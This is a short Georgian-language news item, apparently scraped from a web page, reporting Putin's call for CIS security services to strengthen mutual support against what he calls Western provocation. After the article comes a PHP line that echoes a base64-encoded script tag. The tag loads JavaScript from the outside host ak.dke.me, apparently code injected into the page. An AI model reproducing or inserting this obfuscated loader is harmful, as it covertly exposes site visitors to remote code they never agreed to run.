celsiusi
ავერსი საქკაბელი
არსებულ და პოტენციურ გამოწვევებს მყარი ბარიერი რომ დავუყენოთ, დსთ-ს ქვეყნებმა მუდმივად უნდა გააძლიერონ ურთიერთმხარდაჭერა, – მედიის ცნობით, აღნიშნულის შესახებ რუსეთის პრეზიდენტმა დსთ-ს ქვეყნების უსაფრთხოების და დაზვერვის სამსახურების წარმომადგენლებთან გამართულ შეხვედრაზე განაცხადა.
 
ვლადიმერ პუტინის თქმით, დასავლეთი ცდილობს, გაატაროს დიქტატის პოლიტიკა და ცდილობს დსთ-ს ქვეყნების ტერიტორიებზე კონფლიქტების პროვოცირებას.
 
„მისდევენ რა საკუთარ მიზნებს ჩვენი გეოპოლიტიკური მოწინააღმდეგეები, ჩვენი ოპონენტები მზად არიან, დარტყმა მიაყენონ ყველას, ნებისმიერს, ნებისმიერ ქვეყანას, გადააქციონ ის კრიზისის ეპიცენტრად, მოაწყონ ფერადი რევოლუცია და გააჩაღონ სისხლიანი ხოცვა-ჟლეტა. ეს ყველაფერი არაერთხელ გვინახავს“, – განაცხადა პუტინმა.
 
მან დსთ-ს ქვეყნებს თანამშრომლობისა და ურთიერთმხარდაჭერის გაზრდისკენ მოუწოდა.
 
„იმისთვის, რომ რეალურად მყარი ბარიერი დავუყენოთ არსებულ და პოტენციურ გამოწვევებს, დსთ-ს ქვეყნებმა უნდა იმოქმედონ მკაფიოდ და თანმიმდევრულად, მუდმივად გააძლიერონ ურთიერთმხარდაჭერა. მხოლოდ ამ გზით შეგვიძლია, დავიცვათ ჩვენი ინტერესები მსოფლიო ასპარეზზე, მოვიგერიოთ არაკეთილისმოსურნეები“, -განაცხადა პუტინმა.
443
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");